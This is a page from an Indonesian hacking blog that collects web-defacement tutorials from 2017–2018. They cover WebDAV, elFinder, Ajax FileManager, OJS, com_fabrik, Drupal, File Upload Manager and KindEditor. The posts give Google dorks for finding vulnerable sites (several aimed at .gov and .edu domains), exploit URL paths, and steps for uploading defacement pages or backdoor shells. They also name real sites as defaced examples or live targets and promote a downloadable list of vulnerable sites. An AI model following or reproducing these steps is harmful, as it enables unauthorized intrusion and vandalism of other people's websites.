Showing posts with label DEFACE. Show all posts
Showing posts with label DEFACE. Show all posts

Monday, July 16, 2018

Deface Metode Webdav di Windows

 

Hello Everyone๐Ÿ˜˜

Di postingan kali ini saya akan memberikan sedikit tutorial deface webdav di windows, untuk yang versi android bisa kalian lihat disini Deface Metode Webdav di Termux .
Oke langsung saja kita persiapkan dulu bahan - bahannya.

Bahan:
Dork:
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:.gov
  • inurl:webdav
  • inurl:.com.x/*.asp
  • inurl:.gov.x/*.asp
  • inurl:.edu.x/*.asp
  • inurl:.net.x/*.asp
  • inurl:.org.x/*.asp
Tutor:
  • Pertama kalian siapkan dulu semua bahan - bahan yang di butuhkan, download dulu file webdav yang di sediakan
  • Sebelum file webdav kalian di ekstrak matikan dulu semua antivirus yang kalian punya, lalu install tools seperti biasa
  •  Setelah di install lalu buka tools dan klik "WebDav" dan "Asp Shell Maker"


  • Jika sudah muncul tampilannya seperti di bawah lalu klik "Setting" dan "Load Shell From File" jika sudah di tambahkan jangan lupa ganti nama script kalian
  • Kalau kalian mau tebas index kalian tinggal ganti nama file kalian jadi "index.html"

  • Jika sudah lalu klik "Add site" dan  masukkan website target kalian yang sebelumnya kalian sudah cari dengan dork diatas atau kalian bisa copy dari file bonus website vuln webdav


  • Lalu klik "Ok " setelah itu klik "Serang", jika berhasil maka tampilannya akan seperti di bawah ini

  • Jika sudah seperti di atas kalian tinggal copy link yang di garis bawahi lalu kalian bisa mirror hasil deface kalian atau kalian bisa pamerin ke temen - temen kalian.
http://apparelworld.org/index.html


Oke sekian dulu tutorial dari saya semoga bermanfaat, jangan lupa di share ke temen - temen kalian ya

Sampai jumpaa....

Read more

Sunday, July 8, 2018

Deface Metode Elfinder 2.0

Hello Everyone๐Ÿ˜˜

Di postingan klai ini saya akan memberikan tutorial deface metode elfinder, ya memang metode ini sudah lama banget ada tapi apa salahnya kita bahas itu disini itung - itung nambahin post:v

Bahan - bahan:

- Script deface

- Dork:
  • inurl:/elfinder/elfinder.php.html
  • inurl:/elfinder/elfinder.html
  • inurl:/elfinder/files/
-Exploit:
  • http://site.com/[path]/elfinder/elfinder.html 
  • http://site.com/[path]/elfinder/elfinder.php.html   
  • http://site.com/[path]/elfinder/src/elfinder-src.php.html

Tutor: 

  • Pertama kita dorking dengan dork di atas seperti biasa
 

  • Lalu pilih salah satu target 
  • Jika targetnya Vuln maka tampilannya akan seperti ini
  •  Kalian tinggal upload script deface kalian dengan cara klik icon gambar floppy disk yang ada tanda tambahnya
 
  • Klik iconnya dan kalian tinggal pilih script deface yang mau kalian upload
  • Nah untuk akses scriptnya kalian tinggal klik kanan di icon script kalian lalu pilih "GET Info"

  • Lalu klik link
  • Kalo cara akses script di atas ribet kalian tinggal double klik aja icon script kalian:v
  • Contoh hasil deface saya
http://fatherandsongolf.co.uk/userfiles/5E9BYYQteR/single.html   

Live target: http://fatherandsongolf.co.uk/library/elfinder/elfinder.html

Oke sekian tutorial dari saya semoga bermanfaat, Sampai jumpa....

    Read more

    Sunday, July 1, 2018

    Kumpulan Web Vuln Webdav 2000+


    Hello Everyone๐Ÿ˜˜

    Pada postingan kali ini saya akan membagikan kumpulan website vuln webdav.
    bagi yang belum tau apa itu webdav kalian bisa mempelajarinya di sini Webdav PHP AutoXploiter

    Oke langsung saja ini dia link download list webdav vuln 2018:

    Oke Sekian dulu postingan kali ini semoga bermanfaat, jangan lupa tunggu postingan postingan selanjutnya yaa.....

    Read more

    Monday, June 11, 2018

    Deface Metode Ajax FileManager

    Selamat Sore:*

    Pada postingan kali ini saya akan memberikan tutorial deface metode ajax filemanager.

    ~ Bahan:
    • intitle:"Ajax File Manager" site:au
    • inurl:/ajaxfilemanager.php intext:"/Root Folder"
    • inurl:/ajaxfilemanager.php intext:"upload"
    • inurl:/ajaxfilemanager.php .ac.
    • intitle:"index of" intext:"ajaxfilemanager.php" 
    ~ Script deface berekstensi .txt

    Cara:

    • Pertama dorking menggunakan dork di atas, lalu pilih web target


    • Lalu cari file bernama "ajaxfilemanager.php" atau kalian bisa langsung tambahkan saja di url sitenya contoh "http://site.com/path/ajaxfilemanager.php" 

      •  Lalu klik tombol upload yang ada di pojok kanan atas


      • Klik tombol browser lalu pilih file txt kalian, setelah itu klik tombol upload

      • Jika sudah di upload lalu arahkan cursor ke nama file yang tadi kita upload maka akan keluar url file kita di pojok kiri bawah, lalu catat urlnya (karna gk bisa di copy jadi catet di kertas ato tulis manual urlnya ya:v)


      • Selesai deh:v kalo kurang jelas langsung chat admin aja atau komen di bawah

      Oke sekian tutorial kali ini semoga bermanfaat, sampai jumpa...


    Read more

    Deface Metode OJS

    Selamat Malam

    Pada postingan kali ini saya akan memberikan tutorial deface metode OJS/Open Journal System, Karna saya bingung mau nyomong apa jadi langsung aja kita ke tutorialnya ya, jangan lupa siapin bahan"nya dulu eaa:v

    Bahan - bahan:
    • OpenJournal register "Index Of" site:id
    • /files/journals/1/articles "articles" site:id
    • /files/journals/1/articles "submission" site:id
    • /files/journals/1/articles "register" site:id
    • /submission/original/ "OJS" 
    • intext:Journal "new submission"
    • inurl:/index.php/index/user/register
    • intext:about submission "Journal"
    • inurl:/index.php/ojs
    Script Deface kalian atau shell backdoor yang berekstensi .phtml

    • Oke pertama kita dorking di google pake dork di atas, lalu pilih web target


    •  Kalo udah dapet websitenya lalu klik "Register" contoh di bawah
      
    • Nah kalo udah klik register terus tampilannya bakal seperti di bawah, lalu isi username dan passwordnya, untuk yang lainnya isi asal aja gak papa yang penting user dan passnya bener:v

     
    •  Scroll ke bawah trus pas di bagian "register as" centang yang "author" dan "reviewer" lalu klik register


    • Setelah klik register maka kalian akan di bawa ke user home nah di situ kalian pilih yang tulisan "New Submission"



    • Abis itu kalian centang semua di bagian kotak submisiion ceklist, lalu klik Save and Continue


    •  Nah di bagian ini kalian pilih "Choose file" Terus kalian cari script deface atau shell backdoor kalian, abis itu klik upload dan Save and Continue
     
    • Scriptnya udah di upload, kalo berhasil tampilannya bakal kya gini

    •  Ohh iya setelah di upload nama file kalian bakalan berubah, bisa klian liat gambar di atas, nama script original saya adalah "single.html" lalu setelah di upload nama filenya di ganti jadi "350-48484867-1-SM.html".
    • Buat akses scriptnya gimana? gampang kok kalian tinggal masukin exploitnya ini aja http://www.site.com/files/journals/1/articles/(IDUSER)/submission/original/(NAMAFILE.html)
    •  Lah IDUSERnya yang mana cok? Nah jadi id user kalian itu adalah 3 angka pertama dari file kalian, misalkan nama file saya "350-48484867-1-SM.html" jadi iduser saya itu "350", paham kan:v
    • Contoh hasil deface saya "http://ojs.akbidylpp.ac.id/files/journals/1/articles/350/submission/original/350-48484867-1-SM.html"

     Oke sekian dulu tutor dari saya kalo kurang jelas bisa kalian tanyakan di chat box...

    Read more

    Saturday, May 26, 2018

    Deface Metode Com_Fabrik



    *_Selamat Pagi_*

    Pada postingan kita kali ini saya akan membahas cara deface metode com_fabrik, Saya yakin pasti di antara kalian sudah pernah mendengar metode ini kan, ya maklum saja memang metode ini sudah cukup lama sekali ada. Oke langsung saja kita menuju tutorialnya.

    Bahan:

     ~ Dork:

    • inurl:index.php?option=com_fabrik
    • inurl:option=com_fabrik&format=raw
    • com_fabrik site:
    • inurl:index.php/component/fabrik/ site:
    • inurl:index.php?option=com_fabrik&view= site:
    • inurl:viewTable?cid= site:com
     ~ Exploit:
    • /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload 
     ~ CSRF:
     ~ Script Deface kalian

    Jika semua bahan - bahannya udah ada langsung aja kita mulai tutorilanya.

    • Pertama kalian dorking dengan dork di atas

    • Setelah kalian mendorking lalu kalian pilih web target kalian dan masukkan exploit ini http://site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload atau kalian bisa liat exploitnya di atas
    • jika webnya vuln maka tampilannya akan seperti ini
     

    • Lalu Copy - Paste link website target kalian ke CSRF kalian, seperti di bawah ini
     

    • Jika sudah, kalian save dan buka di browser kalian seperti ini
     

    • Lalu klik "Browse..." dan cari script deface kalian, jika sudah dipilih lalu klik tombol "sikat!!" jika berhasil maka tampilannya seperti di bawah ini

    • Untuk melihat hasil deface kalian http://site.com/scriptdeface.html
     
    http://www.zambianacmisonline.org/single.html

     Oke sekian tutorial dari saya semoga bermanfaat sampai jumpa di postingan selanjutnya....

     
    Read more

    Sunday, April 29, 2018

    Deface Metode Drupal Hidden Uploader

    Deface Metode Drupal Hidden Uploader

    Hasil gambar untuk drupal hidden uploader 

    Selamat Malam๐Ÿ˜

    Pada  postingan kali ini saya akan memberikan tutorial deface (setelah lama kagak ngepost tutor:v, sorry ya soalnya ane lgi sibuk sekolah XD) 
    kali ini saya memberikan tutor deface metode drupal hidden uploader, metode ini juga banyak di pake oleh para defacer untuk ngepush mirror (bukan cuma ngepush rank doang:v) menurut saya metode ini juga cukup mudah, makannya banyak yang make metod ini.
    Okelah jangan kebanyakan omong yah langsung aja kita ke tutor.

    Bahan - bahan:
    - Dork: - Allowed file types: png gif jpg txt. site:gov                                  
                 - Allowed file types: png gif jpg txt. site:edu
                 - Allowed file types: png gif jpg txt. site:
                 - Allowed file types: html txt site:gov
                 - Allowed file types: html txt site:edu

    - Script deface yang berekstensi .txt dan .html (Karna tidak semua web bisa di upload sc html)

     Tutor:
    • Pertama kalian cari target dengan dork di atas, lalu pilih salah satu web untuk di eksekusi
    • Lalu cari tempat untuk mengupload file

      
    • Website yang vuln tampilannya akan seperti di atas
    • Lalu kalian pilih script deface kalian dan pencet tombol upload
    • Jika berhasil tampilannya akan seperti di bawah

    • Untuk melihat hasil deface nya kalian tinggal klik nama file kalian, maka otomatis akan keluar hasil deface nya

    TUTORIAL VIDEONYA

    Contoh

       

     Oke Sekian Tutorial Dari Saya Semoga Bermanfaat...

    Sampai Jumpa๐Ÿ˜˜ 

    Read more

    Saturday, December 23, 2017

    Deface Metode File Upload Manager v1.3

    Deface Metode File Upload Manager v1.3

    Hasil gambar untuk anime kawaii

    SELAMAT PAGI ๐Ÿ˜€

    Pada kesempatan kali ini saya akan memberikan tutorial tentang metode deface file upload manager, oke langsung saja kita tentukan target dengan menggunakan dork di bawah ini.

    DORK:
    • intitle:File Upload Manager v1.3
    • intext:file types allowed
    Oh iya siapkan script deface berekstensi ".htm" anda bisa rename script html anda 

    Jika sudah di siapkan dorking dengan dork di atas lalu pilih salah satu website jika vuln maka tampilannya akan seperti ini:
      
    Lalu upload script anda dengan cara klik tulisan Browse... lalu pilih script deface anda.
    Jika sudah klik upload, jika berhasil maka tampilannya akan seperti ini:

    Nahh selesai deh untuk melihat hasil defacenya anda bisa klik nama script anda atau mengggunakan url ini site.com/{path}/store/namascript.htm
    contoh:
    http://hosting1993.pev.pl/store/single.htm
    http://powerofmind.cba.pl/fileupload/store/Single[1].htm

    Jika ada yang kurang di mengerti bisa tanyakan di kolom komentar atau bisa lihat videonya DISINI

     Oke sekain tutorial dari saya semoga bermanfaat dan sampai jumpa.....

    Read more

    Thursday, October 19, 2017

    Cara Deface Metode Kind Editor

    Cara Deface Metode Kind Editor

    Hasil gambar untuk deface 

    Selamat Malam ๐Ÿ˜€

    Kali ini kita akan mempelajari cara deface metode Kind Editor
    Pertama kita siapkan Google dork terlebih dahulu

    Contoh Google Dork KindEditor:
    Dork: inurl:examples/uploadbutton.html inurl:uploadbutton.html

    - Cari target dengan google dork di atas


    - Pilih salah satu target



    - Klik upload lalu masukkan script deface anda


    - Jika berhasil maka akan muncul link seperti contoh di atas, lalu copy link di belakang url seperti contoh dibawah ini

    Contoh:
    www.sitetarget.co.li/copyurldisini

    Tekan ENTER maka akan muncul hasil deface anda

    Sekian Tutor Dari Saya Semoga Bermanfaat ๐Ÿ˜

    Selamat Malam Dan Sampai Jumpa....

    Read more